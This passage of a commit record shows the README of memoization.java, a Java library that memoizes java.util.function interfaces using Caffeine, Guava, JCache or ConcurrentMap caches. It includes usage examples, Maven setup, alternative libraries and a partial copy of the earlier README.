<1d6e1cf70ec6f9ab28d3ea4b27a49a77654d370e@shoss.de>","repos":"sebhoss\/memoization.java","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 
8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| 
\u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 
link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongFunction.html[ToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n|===\n\n\n== Development Status\n\nThe Caffeine, Guava, JCache and `ConcurrentMap` based implementations cover all functional interfaces from `java.util.function`. Take a look at the link:https:\/\/github.com\/sebhoss\/memoization.java\/issues[open tickets] for future ideas & ways to help out.\n\n== Usage\n\nMemoize any of the supported types by using the static factory methods supplied by:\n\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-caffeine\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-caffeine.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `CaffeineMemoize` if you want to use link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-guava\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-guava.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `GuavaMemoize` if you want to use link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava] caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-jcache\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-jcache.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `JCacheMemoize` if you want to use link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] (JSR107) caches.\n* pass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/www.javadoc.io\/doc\/de.xn--ho-hia.memoization\/memoization-core\"><img src=\"https:\/\/www.javadoc.io\/badge\/de.xn--ho-hia.memoization\/memoization-core.svg?style=flat-square&color=blue\" alt=\"Read JavaDocs\"><\/a><\/span>] `MapMemoize` if you want to use any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`] as cache.\n\n=== Default cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier);\n----\n\n=== Default cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> 
keyFunction = ...;\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier);\n----\n\n=== Custom cache w\/ default cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nCache<INPUT, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nCache<INPUT, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nCache<INPUT, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nMap<String, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, cache);\n----\n\n=== Custom cache w\/ custom cache keys\n\n[source, java]\n----\n\/\/ memoize in Caffeine cache\nConsumer<INPUT> consumer = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, INPUT> cache = ...; \/\/ com.github.benmanes.caffeine.cache.Cache\nConsumer<INPUT> memoizedConsumer = CaffeineMemoize.consumer(consumer, keyFunction, cache);\n\n\/\/ memoize in Guava cache\nFunction<INPUT, OUTPUT> function = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, OUTPUT> cache = ...; \/\/ com.google.common.cache.Cache\nFunction<INPUT, OUTPUT> memoizedFunction = GuavaMemoize.function(function, keyFunction, cache);\n\n\/\/ memoize in JCache cache\nPredicate<INPUT> predicate = ...;\nFunction<INPUT, KEY> keyFunction = ...;\nCache<KEY, Boolean> cache = ...; \/\/ javax.cache.Cache\nPredicate<INPUT> memoizedPredicate = JCacheMemoize.predicate(predicate, keyFunction, cache);\n\n\/\/ memoize in ConcurrentMap\nSupplier<OUTPUT> supplier = ...;\nSupplier<KEY> keySupplier = ...;\nMap<KEY, OUTPUT> cache = ...;\nSupplier<OUTPUT> memoizedSupplier = MapMemoize.supplier(supplier, keySupplier, cache);\n----\n\nNote that `MapMemoize` accepts any `Map`; however, if the provided `Map` is not also a `ConcurrentMap`, its entries are copied into a new `ConcurrentHashMap`. 
This is done in order to ensure atomic `computeIfAbsent` behavior.\n\n=== Integration\n\nIn order to use this project, declare the following inside your POM:\n\n[source, xml, subs=\"attributes,verbatim\"]\n----\n<dependencies>\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-core<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n\n <!-- CAFFEINE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-caffeine<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.github.ben-manes.caffeine<\/groupId>\n <artifactId>caffeine<\/artifactId>\n <version>${version.caffeine}<\/version>\n <\/dependency>\n <!-- CAFFEINE ONLY -->\n\n <!-- GUAVA ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-guava<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>com.google.guava<\/groupId>\n <artifactId>guava<\/artifactId>\n <version>${version.guava}<\/version>\n <\/dependency>\n <!-- GUAVA ONLY -->\n\n <!-- JCACHE ONLY -->\n <dependency>\n <groupId>{project-group}<\/groupId>\n <artifactId>memoization-jcache<\/artifactId>\n <version>${version.memoization}<\/version>\n <\/dependency>\n <dependency>\n <groupId>javax.cache<\/groupId>\n <artifactId>cache-api<\/artifactId>\n <version>${version.jcache}<\/version>\n <\/dependency>\n <!-- Add your JCache implementation here -->\n <dependency>\n <groupId>...<\/groupId>\n <artifactId>...<\/artifactId>\n <version>...<\/version>\n <\/dependency>\n <!-- JCACHE ONLY -->\n\n<\/dependencies>\n----\n\nReplace `${version.memoization}` with the pass:[<a href=\"https:\/\/search.maven.org\/#search%7Cga%7C1%7Cg%3Ade.xn--ho-hia.memoization\">latest release<\/a>]. This project follows the link:http:\/\/semver.org\/[semantic versioning guidelines].\nPopular JCache implementations are link:http:\/\/www.ehcache.org\/[Ehcache], link:http:\/\/commons.apache.org\/proper\/commons-jcs\/[Commons JCS], link:https:\/\/hazelcast.org\/[Hazelcast], link:http:\/\/infinispan.org\/[Infinispan], link:https:\/\/ignite.apache.org\/[Apache Ignite], link:http:\/\/www.alachisoft.com\/tayzgrid\/[TayzGrid] and link:https:\/\/github.com\/trivago\/triava[triava].\nUse link:https:\/\/github.com\/jhalterman\/expiringmap[ExpiringMap], link:https:\/\/github.com\/ben-manes\/concurrentlinkedhashmap[ConcurrentLinkedHashMap], link:https:\/\/github.com\/OpenHFT\/Chronicle-Map[Chronicle-Map], link:http:\/\/www.cacheonix.org\/[Cacheonix] or other `ConcurrentMap` implementations as alternatives to the default `ConcurrentHashMap` used in the `MapMemoize` factory. 
Caches like link:http:\/\/cache2k.org\/[cache2k] can be used together with both `JCacheMemoize` as a JSR-107 cache and `MapMemoize` by calling `cache.asMap()`.\n\n=== Compatibility\n\nThis project is compatible with the following Java versions:\n\n.Java compatibility\n|===\n| | 1.X.Y | 2.X.Y\n\n| Java 8\n| \u2713\n| \u2713\n|===\n\n== Alternatives\n\n* link:http:\/\/www.tek271.com\/software\/java\/memoizer[Tek271 Memoizer]\n* link:https:\/\/github.com\/kelvinguu\/gitmemoizer[GitMemoizer]\n* link:http:\/\/docs.spring.io\/spring\/docs\/current\/spring-framework-reference\/html\/cache.html#cache-annotations-cacheable[Spring's `@Cacheable`]\n* link:https:\/\/github.com\/marmelo\/chili#memoize[Chili's `@Memoize`]\n* link:https:\/\/clojuredocs.org\/clojure.core\/memoize[Clojure's `(memoize f)`]\n* link:http:\/\/docs.groovy-lang.org\/latest\/html\/gapi\/groovy\/transform\/Memoized.html[Groovy's `@Memoized`]\n* link:https:\/\/github.com\/cb372\/scalacache#memoization-of-method-results[ScalaCache's `memoize`]\n* link:https:\/\/github.com\/aol\/cyclops\/tree\/master\/cyclops-javaslang#memoization-with-a-guava-cache[Cyclops' `Memoize`]\n* link:https:\/\/github.com\/pakoito\/RxMemoization[RxMemoization]\n* link:https:\/\/github.com\/jmorwick\/memoized[memoized]\n* link:https:\/\/github.com\/ggrandes\/memoizer[memoizer]\n* link:http:\/\/aspects.jcabi.com\/annotation-cacheable.html[jcabi's `@Cacheable`]\n* link:https:\/\/github.com\/strongh\/crache#memoization-client[crache]\n\n== License\n\nTo the extent possible under law, the author(s) have dedicated all copyright\nand related and neighboring rights to this software to the public domain\nworldwide. This software is distributed without any warranty.\n\nYou should have received a copy of the CC0 Public Domain Dedication along\nwith this software. 
If not, see http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/.\n\n== Mirrors\n\n* https:\/\/github.com\/sebhoss\/memoization.java\n* https:\/\/bitbucket.org\/sebhoss\/memoization.java\n* https:\/\/gitlab.com\/sebastian.hoss\/memoization.java\n* http:\/\/v2.pikacode.com\/sebhoss\/memoization.java\n* http:\/\/repo.or.cz\/memoization.java.git\n","old_contents":"= memoization.java image:https:\/\/img.shields.io\/badge\/email-%40metio-brightgreen.svg?style=social&label=mail[\"Discuss on Google Groups\", link=\"https:\/\/groups.google.com\/forum\/#!forum\/metio\"] image:https:\/\/img.shields.io\/badge\/irc-%23metio.wtf-brightgreen.svg?style=social&label=IRC[\"Chat on IRC\", link=\"http:\/\/webchat.freenode.net\/?channels=metio.wtf\"]\nSebastian Ho\u00df <http:\/\/seb.xn--ho-hia.de\/[@sebhoss]>\n:github-org: sebhoss\n:project-name: memoization.java\n:project-group: de.xn--ho-hia.memoization\n:coverity-project: 8732\n:codacy-project: 0ed810b7f2514f0ea1c8e86e97c803c4\n:jdk-api: https:\/\/docs.oracle.com\/javase\/8\/docs\/api\n:issue: https:\/\/github.com\/sebhoss\/memoization.java\/issues\n:toc:\n:toc-placement: preamble\n\nimage:https:\/\/img.shields.io\/badge\/license-cc%20zero-000000.svg?style=flat-square[\"CC Zero\", link=\"http:\/\/creativecommons.org\/publicdomain\/zero\/1.0\/\"]\npass:[<span class=\"image\"><a class=\"image\" href=\"https:\/\/maven-badges.herokuapp.com\/maven-central\/de.xn--ho-hia.memoization\/memoization.java\"><img src=\"https:\/\/img.shields.io\/maven-central\/v\/de.xn--ho-hia.memoization\/memoization.java.svg?style=flat-square\" alt=\"Maven Central\"><\/a><\/span>]\nimage:https:\/\/reposs.herokuapp.com\/?path={github-org}\/{project-name}&style=flat-square[\"Repository size\"]\nimage:https:\/\/www.openhub.net\/p\/memoization-java\/widgets\/project_thin_badge?format=gif[\"Open Hub statistics\", link=\"https:\/\/www.openhub.net\/p\/memoization-java\"]\n\nimage:https:\/\/img.shields.io\/travis\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Build Status\", link=\"https:\/\/travis-ci.org\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coveralls\/{github-org}\/{project-name}\/master.svg?style=flat-square[\"Code Coverage\", link=\"https:\/\/coveralls.io\/github\/{github-org}\/{project-name}\"]\nimage:https:\/\/img.shields.io\/coverity\/scan\/{coverity-project}.svg?style=flat-square[\"Coverity Scan Result\", link=\"https:\/\/scan.coverity.com\/projects\/{github-org}-memoization-java\"]\nimage:https:\/\/img.shields.io\/codacy\/grade\/{codacy-project}.svg?style=flat-square[\"Codacy Code Quality\", link=\"https:\/\/www.codacy.com\/app\/mail_7\/memoization-java\"]\nimage:https:\/\/img.shields.io\/badge\/forkable-yes-brightgreen.svg?style=flat-square[\"Can this project be forked?\", link=\"https:\/\/basicallydan.github.io\/forkability\/?u={github-org}&r={project-name}\"]\nimage:https:\/\/img.shields.io\/maintenance\/yes\/2017.svg?style=flat-square[\"Is this thing still maintained?\"]\nimage:https:\/\/img.shields.io\/bountysource\/team\/metio\/activity.svg?style=flat-square[\"Bounties on open tickets\", link=\"https:\/\/www.bountysource.com\/teams\/metio\"]\n\n_Java link:https:\/\/en.wikipedia.org\/wiki\/Memoization[memoization] library - trade space for time_\n\n== Features\n\n* Memoize calls to `Consumer`, `Function`, `Predicate`, `Supplier` and other functional interfaces in `java.util.function`\n* Cache values using link:https:\/\/github.com\/ben-manes\/caffeine[Caffeine], 
link:https:\/\/github.com\/google\/guava\/wiki\/CachesExplained[Guava], link:https:\/\/jcp.org\/en\/jsr\/detail?id=107[JCache] or any link:{jdk-api}\/java\/util\/concurrent\/ConcurrentMap.html[`ConcurrentMap`]\n* Customize cache key calculation\n\n.Coverage of `java.util.function`\n|===\n| | Caffeine | Guava | JCache | ConcurrentMap\n\n| link:{jdk-api}\/java\/util\/function\/BiConsumer.html[BiConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiFunction.html[BiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BiPredicate.html[BiPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/BooleanSupplier.html[BooleanSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Consumer.html[Consumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleBinaryOperator.html[DoubleBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleConsumer.html[DoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleFunction.html[DoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoublePredicate.html[DoublePredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleSupplier.html[DoubleSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToIntFunction.html[DoubleToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleToLongFunction.html[DoubleToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/DoubleUnaryOperator.html[DoubleUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Function.html[Function]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntBinaryOperator.html[IntBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntConsumer.html[IntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntFunction.html[IntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntPredicate.html[IntPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntSupplier.html[IntSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToDoubleFunction.html[IntToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntToLongFunction.html[IntToLongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/IntUnaryOperator.html[IntUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongBinaryOperator.html[LongBinaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongConsumer.html[LongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongFunction.html[LongFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongPredicate.html[LongPredicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongSupplier.html[LongSupplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 
link:{jdk-api}\/java\/util\/function\/LongToDoubleFunction.html[LongToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongToIntFunction.html[LongToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/LongUnaryOperator.html[LongUnaryOperator]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjDoubleConsumer.html[ObjDoubleConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjIntConsumer.html[ObjIntConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ObjLongConsumer.html[ObjLongConsumer]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Predicate.html[Predicate]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/Supplier.html[Supplier]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleBiFunction.html[ToDoubleBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToDoubleFunction.html[ToDoubleFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntBiFunction.html[ToIntBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToIntFunction.html[ToIntFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| link:{jdk-api}\/java\/util\/function\/ToLongBiFunction.html[ToLongBiFunction]\n| \u2713\n| \u2713\n| \u2713\n| \u2713\n\n| 